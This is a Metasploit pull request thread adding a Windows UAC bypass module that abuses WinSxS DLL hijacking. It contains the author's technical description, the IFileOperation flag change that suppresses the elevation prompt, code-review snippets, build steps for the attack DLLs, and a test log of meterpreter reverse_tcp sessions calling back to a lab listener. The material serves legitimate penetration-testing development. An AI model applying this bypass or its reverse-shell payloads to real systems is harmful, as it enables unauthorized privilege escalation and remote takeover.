Add bypassuac_injection_winsxs.rb module
rapid7/metasploit-framework pull request #8509
Opened 2017-06-03 11:32 UTC by L3cr0f

This pull request will include a new bypass UAC module, based on "bypassuac_injection". However, this one works in the latest Windows build version, but not on Windows 7.
To implement it I had to modify and also include some files, the paths of these files are pointed out in each section.

## **MODULE**
**/metasploit-framework/modules/exploit/windows/local/bypassuac_injection_winsxs.rb**

This is the module to perform an UAC bypass on Windows systems, it abuses the way Windows manages the "WinSxS" folder to perform a DLL hijacking. You can see how it works in the following gifs:

**WIndows 10 - x64 Version - Build 14393**
![bypassuac_metasploit_windows_x64](https://cloud.githubusercontent.com/assets/17481756/26753108/6cdd54ee-485f-11e7-8340-b3d6b088dc73.gif)

**WIndows 10 - x86 Version - Build 15063**
![bypassuac_metasploit_windows_x86](https://cloud.githubusercontent.com/assets/17481756/26753113/77f3ee4c-485f-11e7-97c8-0a628c34c295.gif)

I decided to create a different module and not to update the one called "bypassuac_injection", because in order to perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to remove the created folders and also prevent a very large output.

If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github: https://github.com/L3cr0f/DccwBypassUAC

## **DLL INJECTION**
**/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
/metasploit-framework/data/post/bypassuac-x64.dll
/metasploit-framework/data/post/bypassuac-x86.dll**

To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

to

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

Note that this modification does not affect other modules.
To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.

## **DLL HIJACKING**
**/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
/metasploit-framework/lib/msf/core/exploit/exe.rb
/metasploit-framework/lib/msf/util/exe.rb**

To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates, which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7). Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean, without having to create an additional DLL template. I don't know how this can be done, so if you come up with something, let me know.

Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.

## **Setup the vulnerable environment**

The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).

2017-06-07 22:09 UTC, wwebb-r7 commented
Really great work.  As I'm sure you're aware, there are a lot of moving parts here, so it's probably going to take awhile for us to finish testing and landing it.  It is being looked at though.

2017-06-07 22:31 UTC, OJ commented
Big +1 from me on this. Great effort, and a fantastic PR description. Props to you @L3cr0f, I love seeing submissions of this level of quality.

2017-06-08 13:50 UTC, L3cr0f commented
Thank you very much!! I hope everything works fine :)

2017-06-16 17:54 UTC, thelightcosine requested changes
I haven't had the time to go through everything yet, but here's my initial code review on the module. Nothing too major but it shows that you're a C developer =)

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
Good use of constants here A+

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
Good use of fail_with and Failure codes here too. Another good example for "what to do" when writing modules here.

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    end
Indentation error here

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    end while findNextFile['return'] != false
an `until` loop would be much cleaner here. Personally I abhor the end while syntax.

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    for i in 0 .. directoryNames.size - 1
can be replaced by calling #each on directoryNames
https://ruby-doc.org/core-2.2.0/Array.html#method-i-each

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    for i in 0 .. directoryNames.size - 1
can be replaced by calling #each on directoryNames
https://ruby-doc.org/core-2.2.0/Array.html#method-i-each

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    for i in 0 .. droppedElements.size - 1
can be replaced by calling #each on droppedElements
https://ruby-doc.org/core-2.2.0/Array.html#method-i-each

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      session.fs.file.rm("#{directoryNames[i]}\\GdiPlus.dll") rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll") rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      session.fs.dir.rmdir(directoryNames[i]) rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}") rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    session.fs.dir.rmdir(file_paths[:szTempDllPath]) rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    session.fs.dir.rmdir(file_paths[:szElevDllFull]) rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +      stat = session.fs.file.stat(droppedElements[i]) rescue nil
please please please never use `rescue nil`. It is terrible and will cause so much heartache down the road

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +  def remove_dropped_elements(session)
This method is overly large and could be refactored out into several smaller methods

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +  def normalize_path(path)
This whole method seems like it can just be replaced with a gsub

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    for i in 0 .. directoryNames.size - 1
can be replaced with (directoryNames.size - 1).times do |i| and will look cleaner and be more Ruby style

2017-06-16 17:54 UTC, dmaloney-r7 commented on modules/exploits/windows/local/bypassuac_injection_winsxs.rb
> +    for i in 1 .. directoryNames.size - 1
can be replaced with (directoryNames.size - 1).times do |i| and will look cleaner and be more Ruby style

2017-06-18 09:43 UTC, L3cr0f commented
I've just update the code as requested. The only thing I didn't use was the "times" expression:
`(directoryNames.size - 1).times do |i|`
I preferred the "step" one as follows, since I needed to avoid the first element:
`1.step(directoryNames.size - 1, 1) do |i|`

I hope everything will be alright :)

2017-06-19 15:18 UTC, thelightcosine approved these changes

2017-06-19 15:22 UTC, dmaloney-r7 commented
wow, great turnaround @L3cr0f. Looks good. i'll leave the C code review to more qualified eyes, but the ruby looks solid now.

2017-07-08 23:13 UTC, sankalpsingha commented
Any idea when this brach is getting merged?

2017-07-11 23:12 UTC, sempervictus commented
@L3cr0f: nice work.
@devs: any blockers on your end?

2017-07-14 20:10 UTC, bwatters-r7 commented
Completely tangential, but I'm adding this as documentation of behavior and a general question:  This exploit fails automated testing consistently, and I have no idea why.

Specifically, when run through the automated testing framework, the primary payload session is established properly, then the exploit fails for unknown reasons.  I have tried to replicate the failure in an environment that allows me to "watch" it, but  all my attempts to break it outside the testing framework fail, and the exploit always succeeds, so I can't "watch" it fail and figure out why.

I have tried starting the original payload through the command line, double-click, script, and task scheduler, and it always works.  I pulled the payload generation scripts from the automated testing framework and run them manually on the same vms on the same hypervisor, and it works, but if I let the vmware_tools process kick of the original payload, this exploit fails every time. 

The closest I have to an answer is when I mock it up and launch it through scripts in the background, I get the following message multiple times on the msfconsole host when it succeeds:

`stty: 'standard input': Inappropriate ioctl for device`

Again, that's only when it succeeds, I cannot get it to error where I can really watch it, and I think that message is related to the file dropper cleanup, anyway.  It drives me a little nuts I cannot replicate the failure where I can better see it.  I have packet captures running on the target VM, and I am sure that the callback does not take place when the process it automated.  It is like the injection takes place as anticipated, but then nothing happens.  I do not know what it is about the primary payload being launched from the tools process, but it appears that is what makes this exploit fail.  I am curious if it expects access to resources that it does not inherit from the tools process?  I have only poked around this today, so I could be worng on that, and I can certainly dig deeper, but I did want to post this to say (1) this is still in progress, (2) maybe someone has seen this before, and (3) if this suddenly show failure on automated testing, that does not mean it does not work.

For what it is worth, when it fails, it does so with this output in the msfconsole:
### Set up original session on Windows 10x64 Build 1511:

```
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.112  yes       The listen address
   LPORT     30001            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> run -z
[*] Started reverse TCP handler on 192.168.135.112:30001 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 192.168.134.174
[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.174:49765) at 2017-07-14 09:48:44 -0700
[*] Session 1 created in the background.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (82 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (192.168.134.174)
Computer        : WIN10X64-1511
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x64/windows  WIN10X64-1511\msfuser @ WIN10X64-1511  192.168.135.112:30001 -> 192.168.134.174:49765 (192.168.134.174)

[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
```
### BypassUAC exploit:
```
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> use exploit/windows/local/bypassuac_injection_winsxs
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set session 1
session => 1
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set target 1
target => 1
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set lhost 192.168.135.112
lhost => 192.168.135.112
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set lport 30002
lport => 30002
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> set verbose true
verbose => true
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.112  yes       The listen address
   LPORT     30002            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-x64-meterpreter-reverse_tcp-192x168x134x174-30001.rc)> run
[*] Started reverse TCP handle [...]

2017-07-27 10:11 UTC, L3cr0f commented
I don't know why it fails, I've performed an automated test against a 32 bits and a 64 bits Windows 10 systems and they have worked as expected. It's true that in the 64 bits Windows 10 machine the first time it failed, but I tried another few times and it has worked properly.

Here I post some screenshots about the performed tests:

**x86 Windows 10**

![x86_automated_test](https://user-images.githubusercontent.com/17481756/28665546-433538a2-72c4-11e7-91d7-bf70d08f66c0.png)

**x64 Windows 10**

![x64_automated_test](https://user-images.githubusercontent.com/17481756/28665555-4b691fde-72c4-11e7-9df3-3e6fac0dabe7.png)

PD: To perform these tests I have used the branch I created for this pull request (L3cr0f:bypassuac_injection_winsxs).

2017-09-26 21:14 UTC, bwatters-r7 commented
I think I found the bug in my automated testing, and since this is starting to fall by the wayside, I'm going to see about getting it landed this week.

2017-10-03 15:45 UTC, bwatters-r7 commented
## Automated Testing
### Reverse_tcp staged payloads as primary and secondary payloads
### Success Criteria: `got system` returned from `getsystem` command
### Windows x64 Workstations:
![image](https://user-images.githubusercontent.com/17987018/31130099-0d15efae-a81c-11e7-9a90-1305c7a6852e.png)

### Windows x86 Workstations:
![image](https://user-images.githubusercontent.com/17987018/31134481-d6513698-a827-11e7-8710-2bb37be3e5c1.png)

2017-10-03 21:33 UTC, bwatters-r7 commented
@L3cr0f, fixed the bug on my side of testing.  I'd like to bring this across the line and get it merged, but I need to run down some housekeeping stuff.  First, this module needs documentation in the form of a markdown document.  We are asking new modules to contain documentation data within framework.  (see https://github.com/rapid7/metasploit-framework/pull/9009/files#diff-09fb02a81f3c3b2493af23f0e175a889)  Honestly, I was about to write one, because you've done a fantastic job of documentation, but one of the things I'd like documented is how to rebuild all the binary files, so I tried to run through the process myself.  The accompanying script builds the template dll, but not the uploaded "attack" dlls.  Are those products of the sln project on https://github.com/L3cr0f/DccwBypassUAC or is there a stand-alone build method I am missing?

2017-10-04 12:14 UTC, L3cr0f commented
@bwatters-r7, to generate the attacking DLLs, bypassuac-x86.dll and bypassuac-x64.dll, we need to import the Visual Studio project located in Metasploit in the path "/metasploit-framework/external/source/exploits/bypassuac_injection/", after that, we also need to import the reflective dll project located in https://github.com/rapid7/ReflectiveDLLInjection/tree/88e8e5f109793f09b35cb17a621f33647d644103 which must be placed in "/metasploit-framework/external/source/ReflectiveDLLInjection/". Once we have all these files we can start to modify them as we want.

To compile such project we can use several methods, the one that I performed first was by means of Visual Studio GUI. First, you have to select the release version and the architecture of the resultant DLL, after that you have to click on the "Build" tab and select "Build bypassuac_injection".

![gui_vs](https://user-images.githubusercontent.com/17481756/31174778-03a7b564-a90d-11e7-9326-751fb6fdecee.png)

A second way to generate the DLLs is by means of the developer command prompt for Visual Studio. We must be located in the folder "/metasploit-framework/external/source/exploits/bypassuac_injection/" and then type the following commands:

> msbuild bypassuac_injection.sln /p:Configuration=Release /p:Platform=x64
> msbuild bypassuac_injection.sln /p:Configuration=Release /p:Platform=Win32

![commandline_vs](https://user-images.githubusercontent.com/17481756/31174786-0cc1b12c-a90d-11e7-8da8-fb551c001659.png)

The resulting DLLs will be stored in the path "/metasploit-framework/external/source/exploits/bypassuac_injection/Release/".

After that, the DLLs must be copied to the path "/metasploit-framework/data/post/".

More or less this will be the "Markdown documentation" that will be uploaded as part of this pull request once you have given your approval to it.

2017-10-04 15:25 UTC, bcook-r7 commented on external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
> -			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
This looks like a debug change. Does this need to be here, or does it work with the original flags?

2017-10-04 15:42 UTC, L3cr0f commented on external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
> -			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
The original flags make UAC bypass imposible from 15003 Windows 10 build, this is why I modified them in this way. This is explained in the first comment.

2017-10-10 22:08 UTC, bwatters-r7 commented
@L3cr0f I dropped a PR to you, it is ugly, but the TL;DR is if you are OK with the changes (the docs), don't worry about merging it.  Just let me know and I'll land it with the changes.

2017-10-11 09:46 UTC, L3cr0f commented
@bwatters-r7 I've just merged your PR. The work you've done is impressive!

2017-10-11 21:00 UTC, bwatters-r7 commented
## Final testing.....
### Bypassuac_winsxs on Windows x86:
![image](https://user-images.githubusercontent.com/17987018/31451453-c7c8c80c-ae71-11e7-8ad0-24e4169defcf.png)

### Bypassuac_winsxs on Windows x64:
![image](https://user-images.githubusercontent.com/17987018/31451496-e0c7e004-ae71-11e7-9aa7-4f99e932e034.png)

### Bypassuac_injection (Old) on Windows x86:
![image](https://user-images.githubusercontent.com/17987018/31454722-f87921fe-ae7b-11e7-8a0c-70a7d568b719.png)

### Bypassuac_injection (Old) on Windows x64:
![image](https://user-images.githubusercontent.com/17987018/31466570-4baf47e2-ae9d-11e7-9b4a-01e1e5d56e38.png)

2017-10-11 21:26 UTC, merged

2017-10-11 21:30 UTC, bwatters-r7 commented
# Release notes
This module adds a bypass for the Windows UAC system.  It takes advantage of a DLL hijacking vulnerability in the behavior of WinSxS to launch an elevated process without generating a dialog box.

2017-10-11 21:31 UTC, bwatters-r7 commented
@L3cr0f, thank you again for the great PR; my apologies it took us so long to get it merged!  With modules like this, I really hope to work with you in the future.

2017-10-11 21:42 UTC, OJ commented
Great stuff. Thanks to everyone for their efforts!